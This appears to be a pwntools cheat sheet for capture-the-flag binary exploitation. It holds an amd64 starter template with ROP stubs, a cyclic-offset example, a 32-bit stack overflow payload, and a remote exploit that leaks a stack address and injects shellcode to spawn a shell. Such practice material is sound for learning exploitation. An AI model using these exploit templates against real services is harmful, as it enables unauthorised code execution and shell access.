
Pwntools

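# Install into the current user's site-packages instead of the system
# interpreter: `sudo pip install` runs the package's install/build code as
# root and can overwrite distro-managed Python packages.
python3 -m pip install --user --upgrade pwntools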

amd64 ELF starter

from pwn import *

## Logging / target settings
# 'DEBUG' makes pwntools print every byte sent to and received from the target.
context.log_level = 'DEBUG'
context(os='linux', arch='amd64')

## input
# Path of the target binary and the number of filler bytes placed before the
# value that should land on the saved return address (see the rop_chain stub
# below). Both are per-binary values.
filename = "./exe"
offset = 50

## elf stuff
# libc = ELF('./glibc/libc.so.6', checksec=False)
# Assigning to context.binary also sets context.arch/bits/os from the ELF
# header, so the context() call above is superseded by the binary's own values.
context.binary = elf = ELF(filename)
rop = ROP(elf)        # gadget search over the executable's own code
plt = elf.plt         # symbol name -> PLT stub address
got = elf.got         # symbol name -> GOT entry address
symbols = elf.sym     # symbol name -> address

## Process
# Pick one: remote() for the hosted service, process() to run the binary
# locally, gdb.debug() to start it under gdb with the commands given below.
# p = remote()
# p = process(filename)
p = gdb.debug(filename, '''
break *main+50
continue
''')

# Filler bytes; the stub below appends the chain directly after them.
padding = b"A" * offset

## Stubs
# Commented-out building blocks kept for copy/paste; none of them run as written.
#
# leak = u64(p.recvline().strip().ljust(8, b'\0'))
#
# pop_rdi_ret = rop.find_gadget(['pop rdi', 'ret'])[0]
# ret = rop.find_gadget(['ret'])[0]
# rop_chain = flat(
# pop_rdi_ret,
# p64(0x00601060),
# ret,
# plt.system,
# )
# payload = padding + rop_chain

# Only the filler is sent as written; enable the stubs above to append a chain.
payload = padding

# Wait for the prompt, then send the payload followed by a newline.
p.sendlineafter(b'> ', payload)

# Hand the tube over to the terminal for manual interaction.
p.interactive()

Examples

from pwn import *

# Build a de Bruijn pattern (every 4-byte window is unique by default), then
# map a window seen in a register or crash dump back to its offset in it.
pattern = cyclic(length=100)  # 100 bytes long
offset = cyclic_find(subseq='vaaa')
from pwn import *

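# GDB
# searchmem 0x41414141
# searchmem 0x08049318

# gdb-peda$ searchmem 0x41414141
# [stack] : 0xffffcc50 ("AAAA")

# gdb-peda$ searchmem 0x08049318
# [stack] : 0xffffcd0c --> 0x8049318 (<main+103>: mov eax,0x0)

# print/d 0xffffcd0c - 0xffffcc50
# $1 = 188

# Local run; swap in the remote() line for the hosted instance.
p = process('./vuln')
# p = remote('x.x.x.x', 30897)
# Distance from the start of the buffer to the saved return address, taken
# from the gdb session transcribed above.
offset = 188

# 32-bit target: p32 packs a 4-byte value using the context endianness
# (little-endian by default).
next_address = p32(0x080491e2)
payload = b'A' * offset
payload += next_address

# Fake return address for the called function; it is never returned from,
# so the value does not matter.
payload += p32(0x00000000)

# Arguments the target function reads from the stack.
payload += p32(0xdeadbeef)
payload += p32(0xc0ded00d)

p.recvline()
p.sendline(payload)

# Drain whatever the target prints back. recv() raises EOFError once the
# process exits, so this loop is best-effort. `except Exception` replaces the
# original bare `except:` so Ctrl-C (KeyboardInterrupt) still stops the script
# instead of being swallowed as "Done.".
try:
    for _ in range(5):
        print(p.recv(1024))
except Exception:
    print("Done.")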
from pwn import *

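def main():
    """Drive the menu-driven remote service end to end.

    Sequence (prompts as observed in the session):
      1. option 1 prints a stack address, parsed here from its "0x..." text;
      2. option 2 authenticates with the hard-coded password;
      3. shellcode + filler + the leaked address is sent as the 'commands'
         input, option 3 is selected, and the tube is handed to the terminal.

    Raises:
        ValueError: if the assembled payload is longer than max_payload_length.
    """
    context.log_level = 'DEBUG'
    context(os='linux', arch='amd64')

    # io = process('./binary_file')
    io = remote('x.x.x.x', 30774)
    password = 'w00tw00t'

    return_address_offset = 84
    max_payload_length = 137

    # Tube delimiters are bytes; passing str relies on pwntools' implicit
    # encoding and emits a warning, so they are bytes literals throughout.
    io.sendlineafter(b'> ', b'1')
    # The last whitespace-separated token of the reply is the address as hex
    # text. int(..., 16) replaces the original chr()-per-byte / rjust / u64
    # round trip, which went through a str and would have mis-encoded any
    # byte >= 0x80 as two UTF-8 bytes before unpacking.
    stack_address = int(io.recvline().strip().split()[-1], 16)
    log.success(f'Leaked stack address: {p64(stack_address)}')

    io.sendlineafter(b'> ', b'2')
    io.sendlineafter(b'password: ', password.encode())

    shellcode = asm(
        shellcraft.popad() +
        shellcraft.sh()
    )

    # Pad the shellcode out to the saved return address, then place the leaked
    # address there (the script assumes the leak points at this buffer).
    padding = b'a' * (return_address_offset - len(shellcode))
    payload = shellcode + padding + p64(stack_address)
    # Not an assert: assert is stripped under `python -O`, and an oversized
    # payload would then be sent without any local check.
    if len(payload) > max_payload_length:
        raise ValueError(f'Payload too big. "{len(payload)}"')

    io.sendlineafter(b'commands: ', payload)
    io.sendlineafter(b'> ', b'3')
    io.interactive()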

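if __name__ == '__main__':
    # Run only when executed as a script, not when imported as a module.
    main()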